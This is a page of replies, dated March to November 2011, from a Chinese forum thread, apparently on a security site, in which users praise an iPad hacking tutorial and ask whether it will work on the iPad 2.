hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 17 楼马上要出的ipad2 是否有同样的方法？回头试试看 2011-3-3 18:22 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 18 楼疙瘩了我也弄了一个ipad 没想到这玩意儿还有这么大的玩法儿——我指它的功能性。现在看到了你的文章后发现它不只是这些玩法了，日了，我要啃一啃了现在要发售ipad 2 了，但是前期在中国不发售准备买个美版的哇嘎嘎希望到时候你的这个教程还有用那样的话我就可以把ubuntu系统装上去了 2011-3-4 09:12 0
Lodd 雪币： 1240 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 148 粉丝 0 关注私信	Lodd 19 楼哦哟，楼主你强的，这才是玩iPad啊！ 2011-3-4 11:55 0
高比拜仁雪币： 745 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	高比拜仁 20 楼关注！感谢lz的分析和分享 2011-3-16 16:44 0
neineit 雪币： 397 活跃值： (352) 能力值： ( LV9，RANK：410 ) 在线值：发帖 19 回帖 224 粉丝 2 关注私信	neineit 10 21 楼 ~~ 总看成IDA下的漏洞利用顶一下。 2011-4-8 17:24 0
meakhella 雪币： 214 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	meakhella 22 楼只能膜拜， 2011-4-8 19:24 0
nkspark 雪币： 101 活跃值： (88) 能力值： ( LV2，RANK：140 ) 在线值：发帖 46 回帖 610 粉丝 0 关注私信	nkspark 3 23 楼牛啊，先顶后看~ 2011-4-11 11:44 0
soswww 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	soswww 24 楼收藏 2011-5-15 22:35 0
雅蠛蝶雪币： 28 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 22 粉丝 0 关注私信	雅蠛蝶 25 楼。。。拜服在楼主强大的耐力下 2011-11-2 17:13 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复